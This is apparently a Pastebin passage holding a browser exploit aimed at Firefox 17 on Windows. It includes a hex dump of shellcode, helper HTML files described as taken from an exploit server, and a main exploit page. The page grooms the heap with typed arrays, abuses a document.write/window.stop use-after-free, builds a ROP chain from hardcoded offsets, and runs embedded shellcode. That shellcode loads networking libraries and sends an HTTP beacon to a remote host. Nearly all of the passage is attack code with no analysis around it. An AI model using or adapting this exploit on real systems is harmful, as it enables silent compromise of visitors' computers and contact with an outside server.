  844. // 01c0 c4 04 01 00 00 0f b7 0f 83 f9 06 72 6c b9 06 00 |...........rl...|
  845. // 01d0 00 00 b8 10 00 00 00 29 c4 89 e7 89 ca d1 e2 50 |.......).......P|
  846. // 01e0 52 31 d2 8a 16 88 d0 24 f0 c0 e8 04 3c 09 77 04 |R1.....$....<.w.|
  847. // 01f0 04 30 eb 02 04 37 88 07 47 88 d0 24 0f 3c 09 77 |.0...7..G..$.<.w|
  848. // 0200 04 04 30 eb 02 04 37 88 07 47 46 e2 d4 59 29 cf |..0...7..GF..Y).|
  849. // 0210 89 fe 58 01 c4 8b bd 4b 02 00 00 f3 a4 c6 85 4f |..X....K.......O|
  850. // 0220 02 00 00 01 e8 2e 00 00 00 31 c0 50 51 29 cf 4f |.........1.PQ).O|
  851. // 0230 57 53 68 c2 eb 38 5f ff d5 53 68 75 6e 4d 61 ff |WSh..8_..ShunMa.|
  852. // 0240 d5 e9 c8 fe ff ff 31 c9 f7 d1 31 c0 f2 ae f7 d1 |......1...1.....|
  853. // 0250 49 c3 00 00 00 00 00 8d bd e9 02 00 00 e8 e4 ff |I...............|
  854. // 0260 ff ff 4f b9 4f 00 00 00 8d b5 75 02 00 00 f3 a4 |..O.O.....u.....|
  855. // 0270 8d bd e9 02 00 00 e8 cb ff ff ff c3 0d 0a 43 6f |..............Co|
  856. // 0280 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 |nnection: keep-a|
  857. // 0290 6c 69 76 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f |live..Accept: */|
  858. // 02a0 2a 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 |*..Accept-Encodi|
  859. // 02b0 6e 67 3a 20 67 7a 69 70 0d 0a 0d 0a 00 83 c7 0e |ng: gzip........|
  860. // 02c0 31 c9 f7 d1 31 c0 f3 ae 4f ff e7 0d 0a 43 6f 6f |1...1...O....Coo|
  861. // 02d0 6b 69 65 3a 20 49 44 3d 77 73 32 5f 33 32 00 49 |kie: ID=ws2_32.I|
  862. // 02e0 50 48 4c 50 41 50 49 00 02 00 00 50 41 de ca 36 |PHLPAPI....PA..6|
  863. // 02f0 47 45 54 20 2f 30 35 63 65 61 34 64 65 2d 39 35 |GET /05cea4de-95|
  864. // 0300 31 64 2d 34 30 33 37 2d 62 66 38 66 2d 66 36 39 |1d-4037-bf8f-f69|
  865. // 0310 30 35 35 62 32 37 39 62 62 20 48 54 54 50 2f 31 |055b279bb HTTP/1|
  866. // 0320 2e 31 0d 0a 48 6f 73 74 3a 20 00 00 00 00 00 00 |.1..Host: ......|
  867. // 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
  868. // *
  869. // 03b0 00 00 00 00 00 00 00 00 00 00 00 90 |............|
  870. // 03bc
  871.  
  872. /****************************************************************************
  873. * The original files as obtained from the exploit server follow:
  874. */
  875.  
  876. //// "content_2.html"
  877. <html><body></body></html><script>var y="?????",url=window.location.href;if(0>url.indexOf(y)){var iframe=document.createElement("iframe");iframe.src="content_3.html";document.body.appendChild(iframe)}else parent.w();function df(){return parent.df()};</script>
  878.  
  879. //// "content_3.html"
  880. <script>var y="?????",z="",z=z+"<body",z=z+">",z=z+"<img",z=z+" height='1' width='1' src='error.html'",z=z+' onerror="javascript: ',z=z+("window.location.href='content_2.html"+y+"';\" "),z=z+">",z=z+"</body",z=z+">",flag=!1,var83=0;
  881. function b(){for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)e[c]=new ArrayBuffer(180);for(c=0;1024>c;c++)d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;return d}function a(){!1==flag&&(flag=!0,window.stop());window.stop();b();window.parent.frames[0].frameElement.ownerDocument.write(z);b()}var83=parent.df();0!=var83&&document.addEventListener("readystatechange",a,!1);
  882. </script>
  883.  
  884. //// main exploit
  885. <html>
  886. <body>
  887. <iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
  888. </body>
  889. </html>
  890.  
  891. <script>
  892.  
  893. var var1=0xB0;
  894. var var2 = new Array(var1);
  895. var var3 = new Array(var1);
  896. var var4 = new Array(var1);
  897.  
  898. var var5=0xFF004;
  899. var var6=0x3FC01;
  900.  
  901. var var7=0x60000000;
  902. var var8=0x18000000;
  903.  
  904.  
  905. var var9=1;
  906.  
  907. var var10 = 0x12000000;
  908. var var11 = 0;
  909. var var12=0;
  910.  
  911. var var13 =0;
  912.  
  913. function df()
  914. {
  915. if(var12==0)
  916. {
  917. return 0x00000000;
  918. }
  919. var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
  920.  
  921. if( var9 == 1 || var9 == 2)
  922. return ( var14 - var12);
  923. else
  924. return 0x00000000;
  925. }
  926.  
  927. function b()
  928. {
  929. var version = al();
  930. if(version <17)
  931. {
  932. window.location.href="content_1.html";
  933. }
  934. if( version >=17 && version <18 )
  935. var12 = 0xE8;
  936. return ;
  937. }
  938.  
  939. function c()
  940. {
  941. var iframe=document.getElementById("iframe");
  942. iframe.src="content_2.html";
  943. }
  944.  
  945. function d()
  946. {
  947. for(var j=0;j<var1;j++)
  948. {
  949. if( j<var1/8 || j==var1-1)
  950. {
  951. var tabb = new Array(0x1ED00);
  952. var4[j]=tabb;
  953. for(i=0;i<0x1ED00;i++)
  954. {
  955. var4[j][i]=0x11559944;
  956. }
  957. }
  958. var2[j]= new ArrayBuffer(var5);
  959. }
  960. for(var j=0;j<var1;j++)
  961. {
  962. var3[j]= new Int32Array(var2[j],0,var6);
  963. var3[j][0]=0x11336688;
  964.  
  965. for(var i=1;i<16;i++)
  966. {
  967. var3[j][0x4000*i] = 0x11446688;
  968. }
  969.  
  970. }
  971.  
  972. for(var j=0;j<var1;j++)
  973. {
  974. if(typeof var4[j] !="undefined")
  975. {
  976. var4[j][0]=0x22556611;
  977. }
  978. }
  979. }
  980.  
  981. function e(view)
  982. {
  983. var i=0;
  984. for(i=0;i<0x400;i++)
  985. {
  986. view[i] = var13+0x1010 ;
  987. }
  988. view[0x0]=var13+0x1010;
  989. view[0x44]=0x0;
  990. view[0x45]=0x0;
  991. view[0x400-4]=var13+0x1010;
  992. view[0x400]=0x00004004;
  993. view[0x401]=0x7FFE0300;
  994. }
  995.  
  996. function f(var15,view,var16)
  997. {
  998. var magneto = "";
  999. var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
  1000. var var29 = magneto;
  1001. var var17 = "\u9060";
  1002. var var18 = "\u9061";
  1003. var var19 = "\uC481\u0000\u0008" ;
  1004. var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
  1005. var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
  1006. var var22 = "\uE589";
  1007. var var23 ="\uC3C9";
  1008. var var24 = "\uE889";
  1009. var24 += "\u608D\u90C0";
  1010.  
  1011. var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
  1012. var var26 = var25 + var16*4
  1013.  
  1014. var var27 =""
  1015. var27 += "\uB890\u2020\u2020";
  1016. var27 += "\uA390"+ae(var26+0x00);
  1017. var27 += "\uA390"+ae(var26+0x04);
  1018. var27 += "\uA390"+ae(var26+0x08);
  1019. var27 += "\uA390"+ae(var26+0x0C);
  1020.  
  1021. var var28 = var17;
  1022. var28 += var20;
  1023. var28 += var19;
  1024. var28 += var22;
  1025. var28 += var27;
  1026. var28 += var29;
  1027. var28 += var21;
  1028. var28 += var18;
  1029. var28 += var23;
  1030. var var29Array = new Array();
  1031. var29Array=ag(var28);
  1032.  
  1033. var var29Ad = var13+0x5010;
  1034. var i=0;
  1035. var j=0;
  1036. var var30=var13+0x4048;
  1037. var var31 = new Array();
  1038.  
  1039. var31[0]=var30;
  1040. var31[1]=var30;
  1041. var31[2]=var30;
  1042. var31[3]=var15[1];
  1043. var31[4]=var29Ad;
  1044. var31[5]=0xFFFFFFFF;
  1045. var31[6]=var13+0x4044;
  1046. var31[7]=var13+0x4040;
  1047. var31[8]=0x00000040;
  1048. var31[9]=var13+0x4048;
  1049. var31[10]=0x00040000;
  1050. var31[11]=var29Ad;
  1051. var31[12]=var13+0x301C;
  1052.  
  1053. for(var i=0 ; i < 0x140 ; i++)
  1054. {
  1055. var31[i+15]=var15[0];
  1056. }
  1057. var var32 = 0x3F8;
  1058. view[0x800+0+var32]=var13+0x4018;
  1059. view[0x800+1+var32]=var13+0x4018;
  1060. for(var i=2 ; i < var31.length ; i++)
  1061. {
  1062. view[0x800+i+var32]= 0x41414141;
  1063. }
  1064. for(var i=0 ; i < var31.length ; i++)
  1065. {
  1066. view[0xC02+i+var32]= var31[i];
  1067. }
  1068. for(var i=0 ; i < var29Array.length ; i++)
  1069. {
  1070. view[0x1000 + i+var32] = var29Array[i];
  1071. }
  1072.  
  1073. }
  1074.  
  1075. function g(var50,view)
  1076. {
  1077. var k = h(var50,view);
  1078. var j=0;
  1079. if( k < 0 )
  1080. return -1;
  1081. view[0x404+k]=var13+0x3010;
  1082. return 1;
  1083. }
  1084.  
  1085. function h(var50,view)
  1086. {
  1087. var address=0;
  1088. var u=0;
  1089. var memory="";
  1090. var var55=0;
  1091. for( u =7; u >=4 ;u--)
  1092. {
  1093. address=view[0x404+u];
  1094. if( address > 0x000A0000 && address < 0x80000000 )
  1095. {
  1096. memory = i(address,0x48,var50,view);
  1097. var55=af(memory[0x14]+memory[0x15]);
  1098. if(var55==address)
  1099. {
  1100. return u;
  1101. }
  1102. }
  1103. }
  1104. return -1;
  1105. }
  1106.  
  1107. function i(address,size,var50,view)
  1108. {
  1109. var var56 = size/2;
  1110. var56 = var56*0x10 +0x04;
  1111. view[0x400]=var56;
  1112. view[0x401]=address;
  1113. return var4[var50][0];
  1114. }
  1115.  
  1116. function j(memory,view)
  1117. {
  1118. var intArray=ag(memory);
  1119. for(var i=0 ; i < intArray.length ; i++)
  1120. {
  1121. view[0x404+i]=intArray[i];
  1122. }
  1123. }
  1124.  
  1125. function k()
  1126. {
  1127. for(var j=0;j<var1;j++)
  1128. {
  1129. if(var2[j].byteLength!=var5)
  1130. {
  1131. return j;
  1132. }
  1133. }
  1134. return -1;
  1135. }
  1136.  
  1137. function l(view,var58)
  1138. {
  1139. view[var58] = var13 + 0x1030;
  1140. view[var58+1] = 0xFFFFFF85;
  1141. }
  1142.  
  1143. function m(view,var58)
  1144. {
  1145. view[var58]=0x00000000;
  1146. for(var j=0;j<var1;j++)
  1147. {
  1148. if(typeof var4[j] !="undefined")
  1149. {
  1150. if(var4[j][0]!=0x22556611)
  1151. return j;
  1152. }
  1153. }
  1154. return -1
  1155. }
  1156.  
  1157. function n(view,firstvar58)
  1158. {
  1159. var var57 = var10 + 0x00100000 + 0x00010000 * var11;
  1160. var var58=0;
  1161. for(var i=0;i<200;i++)
  1162. {
  1163. if(view[var58] != 0x11336688)
  1164. {
  1165. if(view[var58] == 0x22556611 )
  1166. return var58;
  1167. else
  1168. return -1;
  1169. }
  1170. if(var58==0)
  1171. {
  1172. var58 = firstvar58;
  1173. }else{
  1174. var var59=view[var58-0x0C];
  1175. var58 = (var59 - var57)/4;
  1176. }
  1177. }
  1178. return -1;
  1179. }
  1180.  
  1181. function o(var60)
  1182. {
  1183. var view = new Int32Array(var2[var60],0,0x00040400);
  1184.  
  1185. var var59 = view[0x00100000/4-0x0C];
  1186. var var57 = var10 + 0x00100000 + 0x00010000 * var11;
  1187.  
  1188. return ((var59 - var57)/4);
  1189. }
  1190.  
  1191. function p()
  1192. {
  1193. for(var j=0;j<var1;j++)
  1194. {
  1195. for(var i=1;i<16;i++)
  1196. {
  1197. if(var3[j][i*0x4000-0x02]==0x01000000)
  1198. {
  1199. return -i;
  1200. }
  1201. }
  1202. }
  1203. return 0;
  1204. }
  1205.  
  1206. function q(var60)
  1207. {
  1208. var view = new Int32Array(var2[var60],0,0x00040400);
  1209. view[0x00100000/4-0x02]=var7;
  1210. if(var2[var60+1].byteLength==var7)
  1211. return var60+1;
  1212. return -1;
  1213. }
  1214.  
  1215. function r(var60)
  1216. {
  1217. var view = new Int32Array(var2[var60],0,0x00040400);
  1218. view[0x00100000/4-0x02]=var5;
  1219. }
  1220.  
  1221. function t()
  1222. {
  1223. if(typeof sessionStorage.tempStor !="undefined")
  1224. return false;
  1225. sessionStorage.tempStor="";
  1226. return true;
  1227. }
  1228.  
  1229. function u()
  1230. {
  1231. if( t() == true )
  1232. {
  1233. var9 = 1;
  1234. b();
  1235. d();
  1236. c();
  1237. }else{
  1238. return ;
  1239. }
  1240. }
  1241.  
  1242. function v()
  1243. {
  1244. if(k() == -1)
  1245. {
  1246. var11 = p();
  1247. var9 = 2;
  1248. c();
  1249. }else{
  1250. x();
  1251. }
  1252. }
  1253.  
  1254. function w()
  1255. {
  1256. if(var9==1)
  1257. v();
  1258. else
  1259. x();
  1260. }
  1261.  
  1262. function x()
  1263. {
  1264.  
  1265. var var60 = k();
  1266. if(var60==-1)
  1267. return ;
  1268.  
  1269. var nextvar60 = q(var60);
  1270. if(nextvar60==-1)
  1271. return ;
  1272.  
  1273. var var61 = o(var60);
  1274. var var62 = new Int32Array(var2[nextvar60],0,var8);
  1275. var var58 = n(var62,var61);
  1276. if(var58==-1)
  1277. return ;
  1278.  
  1279. var var50 = m(var62,var58);
  1280.  
  1281. var13 = var10 + 0x00100000 + 0x00010000 * var11;
  1282. e(var62);
  1283.  
  1284. l(var62,var58);
  1285.  
  1286. var var64 = var4[var50][0];
  1287.  
  1288. ac(var64,var50,var62,var58,var60);
  1289. }
  1290.  
  1291. function y(index)
  1292. {
  1293. var4[index][1]= document.createElement('span') ;
  1294. }
  1295.  
  1296. function z(index,index2)
  1297. {
  1298. var4[index][1].innerHTML;
  1299. }
  1300.  
  1301. function aa(view,var63)
  1302. {
  1303. return view[var63];
  1304. }
  1305.  
  1306. function ab(address,view,var63)
  1307. {
  1308. view[var63]=address;
  1309. }
  1310.  
  1311.  
  1312. function ac(var64,var50,var62,var58,var60)
  1313. {
  1314. var var15=ah(var64);
  1315.  
  1316. f(var15,var62,var58);
  1317.  
  1318. y(var50);
  1319. var var66 = aa(var62,var58+2);
  1320.  
  1321. var var67 = i(var66,0x40,var50,var62) ;
  1322. j(var67,var62);
  1323.  
  1324. g(var50,var62);
  1325. ab(var13+0x1040 ,var62,var58+2);
  1326.  
  1327. r(var60)
  1328. setTimeout(ad,1000);
  1329. z(var50);
  1330. }
  1331.  
  1332.  
  1333. function ad()
  1334. {
  1335. for(var j=0;j<var1;j++)
  1336. {
  1337. delete var3[j]
  1338. var3[j]= null;
  1339.  
  1340. delete var2[j];
  1341. var2[j] = null;
  1342.  
  1343. if(typeof var4[j] !="undefined")
  1344. {
  1345. delete var4[j];
  1346. var4[j] = null;
  1347. }
  1348. }
  1349. delete var2;
  1350. delete var3;
  1351. delete var4;
  1352. var2=null;
  1353. var3=null;
  1354. var4=null;
  1355. }
  1356.  
  1357. function ae(int32)
  1358. {
  1359. var var68 = String.fromCharCode((int32)& 0x0000FFFF);
  1360. var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
  1361. return var68+var69;
  1362. }
  1363.  
  1364.  
  1365. function af(string)
  1366. {
  1367. var var70 = string.charCodeAt(0);
  1368. var var71 = string.charCodeAt(1);
  1369. var var72 = (var71 << 16) + var70;
  1370. return var72;
  1371. }
  1372.  
  1373. function ag(string)
  1374. {
  1375. if(string.length%2!=0)
  1376. string+="\u9090";
  1377. var intArray= new Array();
  1378. for(var i=0 ; i*2 < string.length; i++ )
  1379. intArray[i]=af(string[i*2]+string[i*2+1]);
  1380. return intArray;
  1381. }
  1382.  
  1383.  
  1384. function ah(var73)
  1385. {
  1386. var var74 = var73.substring(0,2);
  1387. var var70 = var74.charCodeAt(0);
  1388. var var71 = var74.charCodeAt(1);
  1389. var var75 = (var71 << 16) + var70;
  1390. if (var75 == 0)
  1391. {
  1392. var var76 = var73.substring(32, 34);
  1393. var var70 = var76.charCodeAt(0);
  1394. var var71 = var76.charCodeAt(1);
  1395. var75 = (var71 << 16) + var70;
  1396. }
  1397. var var15 = am(var75);
  1398. if (var15 == -1)
  1399. {
  1400. return;
  1401. }
  1402. return var15
  1403. }
  1404.  
  1405. function aj(version)
  1406. {
  1407. var i = navigator.userAgent.indexOf("Windows NT");
  1408. if (i != -1)
  1409. return true;
  1410. return false;
  1411. }
  1412.  
  1413. function ak()
  1414. {
  1415. var ua = navigator.userAgent;
  1416. var browser = ua.substring(0, ua.lastIndexOf("/"));
  1417. browser = browser.substring(browser.lastIndexOf(" ") + 1);
  1418. if (browser != "Firefox")
  1419. return -1;
  1420.  
  1421. var version = ua.substring(ua.lastIndexOf("/") + 1);
  1422. version = parseInt(version.substring(0, version.lastIndexOf(".")));
  1423. return version;
  1424. }
  1425.  
  1426. function al()
  1427. {
  1428. version = ak();
  1429.  
  1430. if (!aj(version))
  1431. return -1;
  1432. return version;
  1433. }
  1434.  
  1435.  
  1436. function am(var77)
  1437. {
  1438. var var15 = new Array(2);
  1439. if (var77 % 0x10000 == 0xE510)
  1440. {
  1441. var78 = var77 - 0xE510;
  1442. var15[0] = var78 + 0xE8AE;
  1443. var15[1] = var78 + 0xD6EE;
  1444. }
  1445. else if (var77 % 0x10000 == 0x9A90)
  1446. {
  1447. var78 = var77 - 0x69A90;
  1448. var15[0] = var78 + 0x6A063;
  1449. var15[1] = var78 + 0x68968;
  1450. }
  1451. else if (var77 % 0x10000 == 0x5E70)
  1452. {
  1453. var78 = var77 - 0x65E70;
  1454. var15[0] = var78 + 0x66413;
  1455. var15[1] = var78 + 0x64D34;
  1456. }
  1457. else if (var77 % 0x10000 == 0x35F3)
  1458. {
  1459. var78 = var77 - 0x335F3;
  1460. var15[0] = var78 + 0x4DE13;
  1461. var15[1] = var78 + 0x49AB8;
  1462. }
  1463. else if (var77 % 0x10000 == 0x5CA0)
  1464. {
  1465. var78 = var77 - 0x65CA0;
  1466. var15[0] = var78 + 0x66253;
  1467. var15[1] = var78 + 0x64B84;
  1468. }
  1469. else if (var77 % 0x10000 == 0x5CD0)
  1470. {
  1471. var78 = var77 - 0x65CD0;
  1472. var15[0] = var78 + 0x662A3;
  1473. var15[1] = var78 + 0x64BA4;
  1474.  
  1475. }
  1476. else if (var77 % 0x10000 == 0x6190)
  1477. {
  1478. var78 = var77 - 0x46190;
  1479. var15[0] = var78 + 0x467D3;
  1480. var15[1] = var78 + 0x45000;
  1481.  
  1482. }
  1483. else if (var77 % 0x10000 == 0x9CB9)
  1484. {
  1485. var78 = var77 - 0x29CB9;
  1486. var15[0] = var78 + 0x29B83;
  1487. var15[1] = var78 + 0xFFC8;
  1488. }
  1489. else if (var77 % 0x10000 == 0x9CE9)
  1490. {
  1491. var78 = var77 - 0x29CE9;
  1492. var15[0] = var78 + 0x29BB3;
  1493. var15[1] = var78 + 0xFFD8;
  1494. }
  1495. else if (var77 % 0x10000 == 0x70B0)
  1496. {
  1497. var78 = var77 - 0x470B0;
  1498. var15[0] = var78 + 0x47733;
  1499. var15[1] = var78 + 0x45F18;
  1500. }
  1501. else if (var77 % 0x10000 == 0x7090)
  1502. {
  1503. var78 = var77 - 0x47090;
  1504. var15[0] = var78 + 0x476B3;
  1505. var15[1] = var78 + 0x45F18;
  1506. }
  1507. else if (var77 % 0x10000 == 0x9E49)
  1508. {
  1509. var78 = var77 - 0x29E49;
  1510. var15[0] = var78 + 0x29D13;
  1511. var15[1] = var78 + 0x10028;
  1512. }
  1513. else if (var77 % 0x10000 == 0x9E69)
  1514. {
  1515. var78 = var77 - 0x29E69;
  1516. var15[0] = var78 + 0x29D33;
  1517. var15[1] = var78 + 0x10018;
  1518. }
  1519.  
  1520. else if (var77 % 0x10000 == 0x9EB9)
  1521. {
  1522. var78 = var77 - 0x29EB9;
  1523. var15[0] = var78 + 0x29D83;
  1524. var15[1] = var78 + 0xFFC8;
  1525. }
  1526. else
  1527. {
  1528. return -1;
  1529. }
  1530.  
  1531. return var15;
  1532. }
  1533.  
  1534. window.addEventListener("onload", u(),true);
  1535.  
  1536. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!